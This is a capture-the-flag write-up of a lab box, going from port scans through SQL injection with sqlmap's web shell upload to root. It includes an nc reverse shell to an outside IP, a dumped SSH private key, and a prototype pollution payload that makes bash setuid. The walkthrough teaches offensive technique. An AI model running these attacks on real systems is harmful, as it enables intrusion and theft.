Host entries
1
10.0.14.39
Content
- Online Food Ordering System SQL Injection
- byondreal/accesor Prototype Pollution
Reconnaissance
Initial reconnaissance for TCP ports
1
2
3
4
nmap -p- -sS --open --min-rate 500 -Pn -n -vvvv -oG allPorts 10.0.14.39
# Ports scanned: TCP(65535;1-65535) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 10.0.14.39 () Status: Up
Host: 10.0.14.39 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 3306/open/tcp//mysql///
Services and Versions running:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
nmap -p22,80,3306 -sCV -n -Pn -vvvv -oN targeted 10.0.14.39
Nmap scan report for 10.0.14.39
Host is up, received user-set (0.16s latency).
Scanned at 2025-02-19 22:26:59 EST for 41s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 a7:d1:fa:91:ef:a1:f3:dc:31:09:ec:4c:52:35:5e:14 (ECDSA)
|_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHoXGVI9crUW5wLQkRewHQWbGNwusS3jF4KUVo079Tvkzb7rEj3dI1ED7ocCnh1NT8errK/Np3hewIwLs29Wtas=
80/tcp open http syn-ack ttl 63 nginx 1.22.1
| http-title: Login
|_Requested resource was login.php
|_http-server-header: nginx/1.22.1
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-favicon: Unknown favicon MD5: 008E138F38C0A467F8B7E7DCAB6CF90A
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
3306/tcp open mysql syn-ack ttl 63 MySQL 5.5.5-10.11.6-MariaDB-0+deb12u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.11.6-MariaDB-0+deb12u1
| Thread ID: 5
| Capabilities flags: 63486
| Some Capabilities: Support41Auth, Speaks41ProtocolNew, ConnectWithDatabase, SupportsCompression, InteractiveClient, SupportsLoadDataLocal, DontAllowDatabaseTableColumn, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolOld, ODBCClient, LongColumnFlag, FoundRows, SupportsTransactions, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: lWQlN!Yz}'C]+Zgu7Nd-
|_ Auth Plugin Name: mysql_native_password
Exploitation
Only ports 80 and 3306 are open, so first I started checking on HTTP service, there is a login page at first redirect:
I then tried to login using Default Credentials, and I got the pair admin:admin123, once inside I started browsing through the interface while capturing my requests using BurpSuite, I did not identify anything like an administrative console, so I research online and found the following blog: Online Food Ordering System - Multiple Unauthenticated SQL Injections (SQLi) .
Basically the application is full of SQLi, so I grabbed one of the captured requests:
1
2
3
4
5
6
7
8
9
10
GET /all-orders.php?status=Delivered HTTP/1.1
Host: 10.0.14.39
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://10.0.14.39/all-orders.php?status=Cancelled%20by%20Customer
Cookie: PHPSESSID=9e96pm2rkd4qvpflrlo7sbg5r1
Upgrade-Insecure-Requests: 1
And saved it as req1 so I can use sqlmap to test for the SQLi:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
sqlmap -r req1 --dbs
[21:54:19] [INFO] GET parameter 'status' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'status' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 60 HTTP(s) requests:
---
Parameter: status (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: status=Delivered' AND (SELECT 9727 FROM (SELECT(SLEEP(5)))KVXz) AND 'qYuV'='qYuV
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: status=Delivered' UNION ALL SELECT CONCAT(0x7171706271,0x4d744d494f585659785950544c6e6a644a496e496d77477964574d524e414962647a534b72425771,0x716a627871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[21:54:25] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.22.1
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[21:54:26] [INFO] fetching database names
available databases [5]:
[*] foms
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
I already know that the application is created with PHP, those apps are mostly vulnerable to a webshell upload through SQLi, so I executed this command to get a non-interactive shell:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
sqlmap -r req1 --os-shell
[21:54:32] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] n
[21:54:41] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs, /usr/local/var/www') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 1
[21:54:45] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[21:54:46] [INFO] trying to upload the file stager on '/var/www/' via UNION method
[21:54:47] [INFO] trying to upload the file stager on '/var/www/html/' via LIMIT 'LINES TERMINATED BY' method
[21:54:48] [INFO] trying to upload the file stager on '/var/www/html/' via UNION method
[21:54:49] [INFO] the remote file '/var/www/html/tmpuraph.php' is larger (713 B) than the local file '/tmp/sqlmap47rqaggu746046/tmpi6pn9v_w' (705B)
[21:54:50] [INFO] the file stager has been successfully uploaded on '/var/www/html/' - http://10.0.14.39:80/tmpuraph.php
[21:54:50] [INFO] the backdoor has been successfully uploaded on '/var/www/html/' - http://10.0.14.39:80/tmpbacyt.php
[21:54:50] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] Y
command standard output: 'www-data'
Now we have a non-interactive shell with sqlmap, then I proceed to get a full interactive shell by running nc -e /bin/bash 10.10.5.122 1234 command.
Privilege Escalation
ETSCTF
To escalate privileges I ran linpeas.sh and the results retrieved this:
1
2
3
4
5
6
7
8
9
10
11
12
══╣ Possible private SSH keys were found!
/home/ETSCTF/.ssh/id_ed25519
www-data@bunreal:/tmp$ cat /home/ETSCTF/.ssh/id_ed25519
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACDxNdFXecbIfNXImPfoR3wiHLwBeIZvEIJZN+PwzmnNZAAAAIjouaTq6Lmk
6gAAAAtzc2gtZWQyNTUxOQAAACDxNdFXecbIfNXImPfoR3wiHLwBeIZvEIJZN+PwzmnNZA
AAAEArDa+6Ncaw7KeyHC0M5zRdrwc/gYIwhcj1kTXA6aHE8fE10Vd5xsh81ciY9+hHfCIc
vAF4hm8Qglk34/DOac1kAAAAAAECAwQF
-----END OPENSSH PRIVATE KEY-----
This is the private key for user ETSCTF so I can use it to access the machine via SSH:
1
2
ssh -i id_rsa ETSCTF@10.0.14.39
ETSCTF@bunreal:~$
ROOT
Then once I’m logged in as user ETSCTF I then proceed to execute the command sudo -l and I can execute a script as user root without password:
1
2
3
4
5
6
ETSCTF@bunreal:~$ sudo -l
Matching Defaults entries for ETSCTF on bunreal:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User ETSCTF may run the following commands on bunreal:
(ALL : ALL) NOPASSWD: /usr/local/bin/breal
This is the content of it:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
ETSCTF@bunreal:~$ cat /usr/local/bin/breal
#!/usr/bin/node
var args = process.argv.slice(2);
const { exec } = require('child_process');
(async () => {
const lib = await import('@byondreal/accessor');
var shell = {}
var property=JSON.parse(args[0]);
var param=args[1];
var val=JSON.parse(args[2])
try {
lib.default (property,param, val)
} catch (e) { }
if(shell.cmd)
{
exec(shell.cmd)
}
As usual, the vulnerability relays on the imported library, in this case @byondreal/accessor, there is a vulnerability reported as byondreal/accesor Prototype Pollution, after reading the article and with the aid of DeepSeek I came with the following payload:
1
2
3
ETSCTF@bunreal:~$ sudo /usr/local/bin/breal '{}' '__proto__.cmd' '"chmod +s /bin/bash"'
ETSCTF@bunreal:~$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1265648 Apr 23 2023 /bin/bash
And we ARE INSIDEEEE!!!
Post Exploitation
Flags are stored at:
/etc/passwd /etc/shadow /proc/1/environ /root /home/ETSCTF
Credentials
- Credentials identified are:
admin:admin123
Notes
- It is important to check other user’s folders in case there is any interesting information, or, in this case, a private key readable by anyone.